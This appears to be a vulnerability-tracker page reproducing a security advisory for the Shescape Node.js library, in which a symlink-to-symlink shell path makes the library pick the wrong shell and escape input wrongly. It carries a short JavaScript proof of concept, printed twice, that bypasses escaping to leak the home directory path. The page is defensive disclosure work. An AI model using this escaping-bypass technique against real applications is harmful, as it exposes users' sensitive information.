Monitor vulnerabilities like this one.
Sign up free to get alerted when software you use is affected.
7.8
Shescape May Identify Wrong Shell Via Malicious Link Chain
GHSA-6f6w-6j58-rq76
Summary
Shescape users who configure their shell to a file on disk that's a link to another link may be at risk of exposing sensitive information. This happens when an attacker creates a link chain to a different shell, which Shescape mistakenly identifies as the actual shell. To protect yourself, update to Shescape v2.1.9 or later.
What to do
- Update shescape to version 2.1.9.
Affected software
| Vendor | Product | Affected versions | Fix available |
|---|---|---|---|
| – | shescape | <= 2.1.9 | 2.1.9 |
| – | shescape | <= 2.1.8 | 2.1.9 |
Original title
Shescape has possible misidentification of shell due to link chains
Original description
### Impact
This impacts users of Shescape that configure their `shell` to point to a file on disk that is a link to a link. The precise result of being affected depends on the actual shell used and incorrect shell identified by Shescape.
In particular, an attacker may be able to bypass escaping for the shell being used. This can result, for example, in exposure of sensitive information, consider the following proof of concept (targeting Shescape v2):
```javascript
import fs from "node:fs";
import { exec } from "node:child_process";
import { Shescape } from "shescape";
import which from "which";
/* 1. Set up */
const shell = which.sync("bash");
const linkToShell = "./csh";
const linkToLink = "./link";
fs.rmSync(linkToLink, { force: true });
fs.rmSync(linkToShell, { force: true });
fs.symlinkSync(shell, linkToShell);
fs.symlinkSync(linkToShell, linkToLink);
/* 2. Misconfiguration */
const execOptions = {
shell: linkToLink,
};
const shescape = new Shescape({
shell: execOptions.shell,
});
/* 3. Payload */
const userInput = "a=:~";
/* 4. Attack example */
exec(
`echo Hello ${shescape.escape(userInput)}`,
{ shell: execOptions.shell },
(error, stdout) => {
fs.rmSync(linkToLink);
fs.rmSync(linkToShell);
if (error) {
console.error(`An error occurred: ${error}`);
} else {
console.log(stdout);
// Output: "Hello a=:/home/user"
}
},
);
```
### Patches
This problem has been patched in [v2.1.9](https://www.npmjs.com/package/shescape/v/2.1.9) which you can upgrade to now.
### Workarounds
If upgrading is not an option, either avoid using a shell or make sure the shell path you use is not a link to a link.
### References
- Shescape Pull Request [#2388](https://github.com/ericcornelissen/shescape/pull/2388)
- Shescape Release [v2.1.9](https://github.com/ericcornelissen/shescape/releases/tag/v2.1.9)
### For more information
- Comment on Pull Request [#2388](https://github.com/ericcornelissen/shescape/pull/2388)
- Open an issue at <https://github.com/ericcornelissen/shescape/issues> (New issue > Question)
This impacts users of Shescape that configure their `shell` to point to a file on disk that is a link to a link. The precise result of being affected depends on the actual shell used and incorrect shell identified by Shescape.
In particular, an attacker may be able to bypass escaping for the shell being used. This can result, for example, in exposure of sensitive information, consider the following proof of concept (targeting Shescape v2):
```javascript
import fs from "node:fs";
import { exec } from "node:child_process";
import { Shescape } from "shescape";
import which from "which";
/* 1. Set up */
const shell = which.sync("bash");
const linkToShell = "./csh";
const linkToLink = "./link";
fs.rmSync(linkToLink, { force: true });
fs.rmSync(linkToShell, { force: true });
fs.symlinkSync(shell, linkToShell);
fs.symlinkSync(linkToShell, linkToLink);
/* 2. Misconfiguration */
const execOptions = {
shell: linkToLink,
};
const shescape = new Shescape({
shell: execOptions.shell,
});
/* 3. Payload */
const userInput = "a=:~";
/* 4. Attack example */
exec(
`echo Hello ${shescape.escape(userInput)}`,
{ shell: execOptions.shell },
(error, stdout) => {
fs.rmSync(linkToLink);
fs.rmSync(linkToShell);
if (error) {
console.error(`An error occurred: ${error}`);
} else {
console.log(stdout);
// Output: "Hello a=:/home/user"
}
},
);
```
### Patches
This problem has been patched in [v2.1.9](https://www.npmjs.com/package/shescape/v/2.1.9) which you can upgrade to now.
### Workarounds
If upgrading is not an option, either avoid using a shell or make sure the shell path you use is not a link to a link.
### References
- Shescape Pull Request [#2388](https://github.com/ericcornelissen/shescape/pull/2388)
- Shescape Release [v2.1.9](https://github.com/ericcornelissen/shescape/releases/tag/v2.1.9)
### For more information
- Comment on Pull Request [#2388](https://github.com/ericcornelissen/shescape/pull/2388)
- Open an issue at <https://github.com/ericcornelissen/shescape/issues> (New issue > Question)
osv CVSS4.0
7.8
Vulnerability type
CWE-200
Information Exposure
- https://github.com/ericcornelissen/shescape/security/advisories/GHSA-6f6w-6j58-r... URL
- https://github.com/ericcornelissen/shescape/pull/2388 URL
- https://github.com/ericcornelissen/shescape Product
- https://github.com/ericcornelissen/shescape/releases/tag/v2.1.9 URL
- https://github.com/advisories/GHSA-6f6w-6j58-rq76
- https://www.npmjs.com/package/shescape/v/2.1.9 URL
- https://nvd.nist.gov/vuln/detail/CVE-2026-30916 Vendor Advisory
Published: 7 Mar 2026 · Updated: 13 Mar 2026 · First seen: 7 Mar 2026